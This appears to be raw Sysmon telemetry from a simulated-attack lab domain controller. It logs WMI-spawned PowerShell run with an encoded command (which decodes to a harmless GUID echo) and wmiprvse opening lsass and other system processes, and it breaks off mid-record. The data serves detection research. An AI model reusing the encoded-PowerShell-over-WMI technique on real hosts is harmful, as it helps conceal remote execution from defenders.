16:52:52.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236847Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.174{05ADC7E1-6D64-603E-77AA-00000000AD01}1193612076C:\Windows\system32\conhost.exe{05ADC7E1-6D64-603E-76AA-00000000AD01}8976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236846Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.174{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236845Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.173{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236844Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.172{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236843Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.171{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236842Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.171{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236841Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.170{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236840Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.169{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236839Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.168{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236838Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.153{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002236837Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:52.153{05ADC7E1-6D64-603E-74AA-00000000AD01}7684\PSHost.132591775720395058.7684.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002236836Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.153{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002236835Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.153{05ADC7E1-6D64-603E-74AA-00000000AD01}7684ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_msenrmqd.zt4.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002236834Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.153{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-77AA-00000000AD01}11936C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000002236833Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.153{05ADC7E1-6D64-603E-74AA-00000000AD01}7684ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1yesp0xk.1hy.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002236832Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.137{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-76AA-00000000AD01}8976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002236831Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.137{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236830Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.137{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236829Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.137{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236828Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.137{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236827Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.137{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-76AA-00000000AD01}8976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002236826Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.137{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-76AA-00000000AD01}8976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002236825Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.148{05ADC7E1-6D64-603E-76AA-00000000AD01}8976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -Encod VwByAGkAdABlAC0ASABvAHMAdAAgADkAMwAyADkAMgBkADAAOAAtADkANABlAGEALQA0ADcANgBiAC0AYgAzADAAOQAtAGQAZgBhADkAMQAyAGEAMQA5AGMAZAA5AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 23542300x80000000000000002236824Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.137{05ADC7E1-6D63-603E-70AA-00000000AD01}3652ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002236823Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.137{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-72AA-00000000AD01}6720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236822Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.137{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-72AA-00000000AD01}6720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002236821Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.137{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 